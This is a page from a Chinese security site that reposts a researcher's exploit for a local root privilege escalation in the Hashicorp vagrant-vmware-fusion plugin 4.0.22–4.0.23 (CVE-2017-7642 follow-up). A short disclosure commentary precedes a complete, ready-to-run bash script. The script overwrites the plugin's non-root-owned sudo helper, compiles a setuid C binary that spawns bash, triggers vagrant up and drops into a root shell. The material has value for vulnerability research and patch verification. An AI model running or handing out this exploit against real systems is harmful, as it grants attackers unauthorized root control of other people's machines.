首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Hashicorp vagrant-vmware-fusion 4.0.23 - Local root Privilege Escalation
来源:https://m4.rkw.io/ 作者:Wadham 发布时间:2017-12-06  
# A couple of weeks ago I disclosed a local root privesc in Hashicorp's
# vagrant-vmware-fusion plugin:
#
# https://m4.rkw.io/blog/cve20177642-local-root-privesc-in-hashicorp-vagrantvmw...
#
# The initial patch they released was 4.0.21 which unfortunately contained a bug
# that prevented it from working at all on mac systems so I was unable to test it.
# I then had to give my mac to Apple for a couple of weeks for some repairs so
# only got around to testing 4.0.22 at the end of last week.
#
# Unfortunately, 4.0.22 is still exploitable and the subsequent release of 4.0.23
# did not fix the issue.  Hashicorp reacted much faster this time, taking only a
# few days to issue a patch instead of a few months and 4.0.24 does fix the issue.
#
# As discussed before the plugin installs a "sudo helper" encrypted ruby script
# and four architecture-specific wrappers into
# ~/.vagrant.d/gems/2.2.5/gems/vagrant-vmware-fusion-4.0.22/bin
#
# vagrant_vmware_desktop_sudo_helper
# vagrant_vmware_desktop_sudo_helper_wrapper_darwin_386
# vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64
# vagrant_vmware_desktop_sudo_helper_wrapper_linux_386
# vagrant_vmware_desktop_sudo_helper_wrapper_linux_amd64
#
# The wrapper that matches the system architecture will be made suid root the
# first time any vagrant box is up'd.  When a vagrant box is started the wrapper
# script elevates privileges and then executes the ruby sudo helper script.
#
# Previously I exploited the unsanitised system("ruby") call to simply invoke the
# wrapper directly and execute an arbitrary fake "ruby" script in the current PATH.
# This is now mitigated with 4.0.22 because the wrapper refuses to execute if it's
# not being called by vagrant.
#
# Unfortunately it's still possible to exploit it because the wrapper executes the
# sudo helper as root, and the sudo helper is not root-owned so we can overwrite it
# with any arbitrary ruby code which will then get executed as root when vagrant up
# is run.
#
# The issue was reported to Hashicorp on 27/07/17 and fixed on 01/08/17.
#
# This exploit requires a vmware_fusion box to be present on the system in order to
# work.  If you don't have one it may take a few minutes to download one.  Like
# last time it targets darwin 64bit but it's likely the other architectures are
# vulnerable too.
#
# https://m4.rkw.io/vagrant_vmware_privesc_4.0.23.sh.txt
# 81c2637cd1f4064c077aabc6fa7a3451ae3f2bd99c67f25c966728f88a89d5a1
# --------------------------------------------------------------------------
 
#!/bin/bash
echo
echo "****************************************************************"
echo "* Wooo vmware_fusion plugin 4.0.22-4.0.23 is still exploitable *"
echo "* m4rkw                                                        *"
echo "****************************************************************"
echo
echo "Shouts to #coolkids"
echo
 
vuln_bin=`find ~/.vagrant.d/ -name vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64 -perm +4000 |tail -n1`
target="/tmp/vagrant_vmware_privesc_4.0.23"
 
if [ "$vuln_bin" == "" ] ; then
  echo "Vulnerable binary not found."
  exit 1
fi
 
if [ -e "$target" ] ; then
  echo "Exploit payload already present."
  $target
  exit
fi
 
box=`vagrant box list |grep '(vmware_desktop' |head -n1 |cut -d ' ' -f1`
 
if [ "$box" == "" ] ; then
  echo "No vmware_fusion boxes found locally, we will have to download one."
  echo
  echo "This will take a few minutes."
  echo
  box="bento/ubuntu-16.04"
fi
 
dir=`dirname "$vuln_bin"`
 
cd "$dir"
 
if [ ! -e "vagrant_vmware_desktop_sudo_helper.bak" ] ; then
  mv vagrant_vmware_desktop_sudo_helper vagrant_vmware_desktop_sudo_helper.bak
fi
 
cat > $target.c <<EOF
#include <unistd.h>
int main()
{
  setuid(0);
  seteuid(0);
  execl("/bin/bash","bash","-c","/bin/bash;rm -f $target",NULL);
  return 0;
}
EOF
gcc -o $target $target.c
rm -f $target.c
 
cat > vagrant_vmware_desktop_sudo_helper <<EOF
#!/usr/bin/env ruby
\`chown root:wheel $target\`
\`chmod 4755 $target\`
EOF
 
chmod 755 vagrant_vmware_desktop_sudo_helper
 
cat > vagrantfile <<EOF
Vagrant.configure('2') do |config|
  config.vm.box = '$box'
end
EOF
 
vagrant up 2>/dev/null &
 
while :
do
  r=`ls -la $target |grep -- '-rwsr-xr-x  1 root  wheel'`
  if [ "$r" != "" ] ; then
    break
  fi
  sleep 0.2
done
 
killall -9 vagrant
 
echo
echo "Sorry Hashicorp.. still fail :P"
echo
 
sleep 1
cd
$target
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Hashicorp vagrant-vmware-fusio
·Proxifier for Mac 2.19 - Local
·Hashicorp vagrant-vmware-fusio
·Sera 1.2 - Local root Privileg
·Hashicorp vagrant-vmware-fusio
·Hashicorp vagrant-vmware-fusio
·Arq 5.9.6 - Local root Privile
·Murus 1.4.11 - Local root Priv
·Arq 5.9.7 - Local root Privile
·WinduCMS 3.1 - Local File Disc
·VX Search 10.2.14 - 'command_n
·Abyss Web Server < 2.11.6 - He
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved